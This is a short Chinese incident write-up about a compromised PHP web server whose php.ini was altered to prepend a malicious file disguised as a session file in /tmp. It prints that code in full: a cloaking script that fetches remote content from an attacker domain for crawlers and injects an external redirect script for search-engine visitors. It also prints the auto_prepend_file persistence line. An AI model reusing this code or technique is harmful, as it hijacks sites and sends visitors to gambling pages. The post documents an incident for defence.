服务器确实被黑了,php.ini被人修改。 解决过程 我们在服务器上全目录搜索了关键词8ybct,发现它存在于eaccelerator-86746.042这个文件中,通过查看这个文件,我们发现了/tmp/sess_vqm0cd7f5f8as9ad7sdxs2167这个文件,打开这个文件便是有害代码: <?php $keyword = "ÁùºÏ²Ê"; $url = 'http://8ybct.com/jiechi/abc.jpg'; $passurl = "http://8ybct.com/jiechi/abc.js"; $robot = 0; $refer = 0; $arrKeyword = explode("|",$keyword); $USER_AGENT = strtolower($_SERVER['HTTP_USER_AGENT']); if(empty($_SERVER['HTTP_REFERER'])){ $HTTP_Referer = "n"; } else{ $HTTP_Referer = strtolower(urldecode($_SERVER['HTTP_REFERER'])); } if(strpos($USER_AGENT,"bot")) $robot = 1; if(strpos($USER_AGENT,"spider")) $robot = 1; if(strpos($USER_AGENT,"slurp")) $robot = 1; if(strpos($USER_AGENT,"mediapartners-google")) $robot = 1; if($robot == 1 && $_SERVER['REQUEST_URI'] == "/discuss/member.php?mod=logging&action=login&mobile=2"){ //Header("Location: ".$url); echo file_get_contents($url); exit; } if($robot == 1 && $_SERVER['REQUEST_URI'] == "/"){ //Header("Location: ".$url); echo file_get_contents($url); exit; } if(strpos($HTTP_Referer,"www.baidu.com/")) $refer = 1; if(strpos($HTTP_Referer,"soso.com/")) $refer = 1; if(strpos($HTTP_Referer,"sogou.com/")) $refer = 1; if(strpos($HTTP_Referer,"so.com/")) $refer = 1; if(strpos($HTTP_Referer,"baidu.com")) $refer = 1; if($refer == 1 && $_SERVER['REQUEST_URI'] == "/discuss/member.php?mod=logging&action=login&mobile=2"){ echo '<script src="'.$passurl.'"></script>'; exit; } if($refer == 1 && $_SERVER['REQUEST_URI'] == "/"){ echo '<script src="'.$passurl.'"></script>'; exit; } ?> 黑客通过修改php.ini,增加了此配置项: auto_prepend_file="/tmp/sess_vqm0cd7f5f8as9ad7sdxs2167" 即实现每当有用户请求网站都会在页面头部加上黑客的那段代码,由于这段代码判断了来源链接,所以只要是百度或搜狗的来源就会返回黑客的跳转脚本,即跳转到赌博网站。
服务器确实被黑了,php.ini被人修改。
解决过程
我们在服务器上全目录搜索了关键词
8ybct,发现它存在于eaccelerator-86746.042这个文件中,通过查看这个文件,我们发现了/tmp/sess_vqm0cd7f5f8as9ad7sdxs2167这个文件,打开这个文件便是有害代码:黑客通过修改php.ini,增加了此配置项:
即实现每当有用户请求网站都会在页面头部加上黑客的那段代码,由于这段代码判断了来源链接,所以只要是百度或搜狗的来源就会返回黑客的跳转脚本,即跳转到赌博网站。